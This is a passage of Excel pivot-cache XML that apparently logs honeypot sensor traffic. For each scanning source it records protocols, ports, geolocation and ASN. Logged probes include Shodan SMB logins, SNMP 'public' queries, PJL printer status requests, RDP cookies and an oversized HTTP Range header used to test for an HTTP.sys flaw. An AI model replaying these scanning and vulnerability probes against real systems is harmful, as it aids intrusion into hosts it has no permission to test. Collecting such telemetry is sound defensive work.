    <s v="&amp;&amp;SMA-LAB_IRC_H30&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_ORACLE_H41&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_SNMP_H9&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_REDIS_H22&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_IRC_H11&amp;&amp;SMA-LAB_IRC_H22&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_NTP_H39&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_IRC_H17&amp;&amp;SMA-LAB_SNMP_H28&amp;&amp;SMA-LAB_PJL_H22&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_SNMP_H27&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_NTP_H41&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_MYSQL_H21&amp;&amp;SMA-LAB_IRC_H8&amp;&amp;SMA-LAB_SMTP_H9&amp;&amp;SMA-LAB_REDIS_H26&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_SIP_H32&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_IRC_H31&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_SMTP_H25&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_NTP_H44&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_RDP_H14&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_POP3_H2&amp;&amp;SMA-LAB_IRC_H15&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_IRC_H26&amp;&amp;SMA-LAB_NTP_H22&amp;&amp;SMA-LAB_IRC_H40&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_SMTP_H12&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_SIP_H5&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_SMTP_H46&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_SIP_H25&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_SOCKS5_H35&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_FTP_H45&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_SOCKS5_H9&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_IRC_H24&amp;&amp;SMA-LAB_SOCKS5_H23"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;28555&amp;&amp;6667&amp;&amp;143&amp;&amp;389&amp;&amp;6379&amp;&amp;1080&amp;&amp;1521&amp;&amp;9100&amp;&amp;161&amp;&amp;25&amp;&amp;23&amp;&amp;5432&amp;&amp;8443&amp;&amp;445&amp;&amp;29011&amp;&amp;1433&amp;&amp;3389&amp;&amp;3306&amp;&amp;5900&amp;&amp;NA&amp;&amp;110&amp;&amp;17553&amp;&amp;23320&amp;&amp;26312&amp;&amp;47964&amp;&amp;22947&amp;&amp;10864&amp;&amp;21&amp;&amp;443&amp;&amp;22601&amp;&amp;30878&amp;&amp;16698&amp;&amp;29586&amp;&amp;30378&amp;&amp;26310&amp;&amp;26200&amp;&amp;14265&amp;&amp;28821&amp;&amp;33710&amp;&amp;18438"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3702"/>
    <s v="4.89517"/>
    <s v="174"/>
    <s v="Cogent Communications"/>
    <s v="Cogent Communications"/>
    <s v="hosting"/>
    <s v="BlackHOST Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login&amp;&amp;query&amp;&amp;command&amp;&amp;request&amp;&amp;GET&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=185.142.236.34;rport=26810'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'KEBO0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'A001'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.42.176', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.233.76.135', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.233.76.135', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.233.76.135', 'Range': 'bytes= 0 - 018446744073709551615', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '66.94.127.183', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '66.94.127.183', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,52158)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,52250)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,52364)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '5.182.38.84', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'PENJ0'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,40756)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,42912)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,44226)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'PKDB0'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,50188)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,51134)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,51628)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,54780)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,55498)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,55696)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.63.23', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.63.23', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '38.54.63.23', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.63.23', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.63.23', 'Range': 'bytes= 0 - 018446744073709551615', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qbxkb1mm'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '94.131.118.77', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '94.131.118.77', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '94.131.118.77', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.118.77', 'Range': 'bytes= 0 - 018446744073709551615', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,58640)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,59472)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,59986)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,47476)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUP,SHODAN)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,48134)}&amp;&amp;{Data_SMB:Incoming connection (185.142.236.34,48472)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'DNLM0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'OKCK0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'MOBP0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'DNFI0'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'identity', 'Host': '38.60.224.106', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.146.12.172', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.146.12.172', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '194.146.12.172', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'LIDK0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '154.26.156.60', 'method': 'GET', 'uri': '/.well-known/security.txt'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'LLBC0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'PCCI0'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'identity', 'Host': '77.91.74.218', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '77.91.74.218', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'identity', 'Host': '77.91.74.218', 'method': 'GET', 'uri': '/sitemap.xml'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'HOHD0'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b98e:ec22"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2046"/>
    <x v="2046"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T04:09:14"/>
    <d v="2025-04-13T04:09:14"/>
    <d v="2025-04-13T04:09:14"/>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2:ccde"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2047"/>
    <x v="2047"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T03:52:12"/>
    <d v="2025-04-13T03:52:12"/>
    <d v="2025-04-13T03:52:12"/>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dd:d045"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2048"/>
    <x v="2048"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T03:51:34"/>
    <d v="2025-04-13T03:51:34"/>
    <d v="2025-04-13T03:51:34"/>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e:80a3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2049"/>
    <x v="2049"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T03:48:11"/>
    <d v="2025-03-31T15:08:38"/>
    <d v="2025-04-13T03:48:11"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H45"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Kota Bandung"/>
    <s v="Bandung"/>
    <s v="1650357"/>
    <s v="NA"/>
    <s v="-6.92222"/>
    <s v="107.607"/>
    <s v="55699"/>
    <s v="PT. Cemerlang Multimedia"/>
    <s v="PT. Cemerlang Multimedia"/>
    <s v="business"/>
    <s v="PT Aksara Perdana Multimedia"/>
    <s v="2019-12-23"/>
    <s v="IDNIC-APM-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.147.8.180,24227)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6793:8b4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2050"/>
    <x v="2050"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T03:29:32"/>
    <d v="2025-04-13T03:29:32"/>
    <d v="2025-04-13T03:29:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:4312"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
